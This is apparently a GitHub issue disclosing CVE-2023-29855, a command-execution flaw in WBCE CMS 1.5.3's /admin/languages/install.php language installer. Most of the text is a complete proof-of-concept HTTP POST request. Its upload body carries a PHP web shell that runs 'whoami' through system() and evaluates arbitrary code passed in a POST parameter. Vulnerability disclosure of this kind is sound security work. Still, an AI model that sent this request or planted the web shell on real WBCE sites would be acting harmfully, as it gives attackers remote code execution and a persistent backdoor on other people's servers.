Headline
CVE-2023-29855: Command execution vulnerability exists in WBCE CMS V1.5.3 background · Issue #544 · WBCE/WBCE_CMS
WBCE CMS 1.5.3 has a command execution vulnerability via admin/languages/install.php.
There is a command execution vulnerability in the background of WBCE CMS V1.5.3.
Vulnerability URL /admin/languages/install.php Install Language module parameter filtering is not strict, there is a command execution vulnerability
In the receiving method on line 47 of the file /admin/languages/install.php, the system first saves the data submitted by the client to a temporary file, and then executes the relevant code to trigger the command execution vulnerability.
POST /admin/languages/install.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Referer: http://localhost/admin/languages/index.php
Cookie: phpsessid-5239-sid=hhh85m1as94tpdkq36vnjcommm; WBCELastConnectJS=1664417056; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------7377265762079
Content-Length: 496
-----------------------------7377265762079
Content-Disposition: form-data; name="formtoken"
67491209-95651bfdf4022592df7062726ca433cbba088a8b
-----------------------------7377265762079
Content-Disposition: form-data; name
Content-Type: application/octet-stream
<?php echo(system('whoami'));@eval($_POST[stcs]);?>
-----------------------------7377265762079
Content-Disposition: form-data; name="submit"
-----------------------------7377265762079—